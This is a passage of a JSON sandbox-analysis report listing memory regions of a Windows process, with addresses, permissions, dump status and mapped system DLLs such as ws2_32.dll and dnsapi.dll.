null, "id": "region_887", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:01:03.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_888", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:03.580", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3022847, "entry_point": 0, "filename": null, "id": "region_890", "name": "pagefile_0x00000000002e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3014656, "timestamp": "00:01:03.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_896", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:03.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3088383, "entry_point": 0, "filename": null, "id": "region_898", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_899", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_900", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:03.709", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000901-addr_0x00000000029b0000-size_0x0000000000220000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2228224, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_901", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:01:03.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_902", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:03.716", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000903-addr_0x0000000002bd0000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 45940736, "type": "region", "version": 1 }, "end_va": 48037887, "entry_point": 0, "filename": null, "id": "region_903", "name": "private_0x0000000002bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45940736, "timestamp": "00:01:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_904", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", "version": 1 }, "end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_905", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 8791728652288, "timestamp": "00:01:03.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 36503551, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:03.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:01:03.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_908", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:03.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_909", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:03.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_910", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:03.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_911", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:03.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 45219839, "entry_point": 0, "filename": null, "id": "region_921", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_922", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_923", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000924-addr_0x0000000000300000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3149823, "entry_point": 0, "filename": null, "id": "region_924", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:03.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3149823, "entry_point": 0, "filename": null, "id": "region_925", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:03.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_926", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:03.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48693248, "type": "region", "version": 1 }, "end_va": 49741823, "entry_point": 0, "filename": null, "id": "region_927", "name": "private_0x0000000002e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 48693248, "timestamp": "00:01:03.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_928", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:03.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_929", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:03.783", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000930-addr_0x0000000000310000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_930", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:01:03.784", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000931-addr_0x0000000001f00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_931", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:03.784", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000932-addr_0x0000000001f00000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_932", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:03.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_933", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:03.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_956", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:03.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50855936, "type": "region", "version": 1 }, "end_va": 51904511, "entry_point": 0, "filename": null, "id": "region_957", "name": "private_0x0000000003080000", "norm_filename": null, "region_type": "private_memory", "start_va": 50855936, "timestamp": "00:01:03.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_958", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:03.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_959", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:01:03.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_960", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:03.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 46530560, "type": "region", "version": 1 }, "end_va": 47054847, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x0000000002c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 46530560, "timestamp": "00:01:03.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 48037887, "entry_point": 0, "filename": null, "id": "region_974", "name": "private_0x0000000002d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 47513600, "timestamp": "00:01:03.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53477376, "type": "region", "version": 1 }, "end_va": 54525951, "entry_point": 0, "filename": null, "id": "region_975", "name": "private_0x0000000003300000", "norm_filename": null, "region_type": "private_memory", "start_va": 53477376, "timestamp": "00:01:03.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_976", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:03.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_977", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:03.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_978", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:03.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_979", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:03.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_980", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:03.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 339968, "start_va": 8791727276032, "type": "region", "version": 1 }, "end_va": 8791727615999, "entry_point": 8791727287192, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_981", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 8791727276032, "timestamp": "00:01:03.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_982", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:03.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_983", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_984", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_985", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_986", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:03.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_987", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:03.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_988", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:03.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52166656, "type": "region", "version": 1 }, "end_va": 53215231, "entry_point": 0, "filename": null, "id": "region_1128", "name": "private_0x00000000031c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52166656, "timestamp": "00:01:04.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1129", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:04.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1130", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:01:04.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 57147391, "entry_point": 0, "filename": null, "id": "region_1133", "name": "private_0x0000000003580000", "norm_filename": null, "region_type": "private_memory", "start_va": 56098816, "timestamp": "00:01:04.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791726948352, "type": "region", "version": 1 }, "end_va": 8791727046655, "entry_point": 8791726955512, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1134", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791726948352, "timestamp": "00:01:04.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791727079424, "type": "region", "version": 1 }, "end_va": 8791727149055, "entry_point": 8791727085228, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1135", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 8791727079424, "timestamp": "00:01:04.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:01:04.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 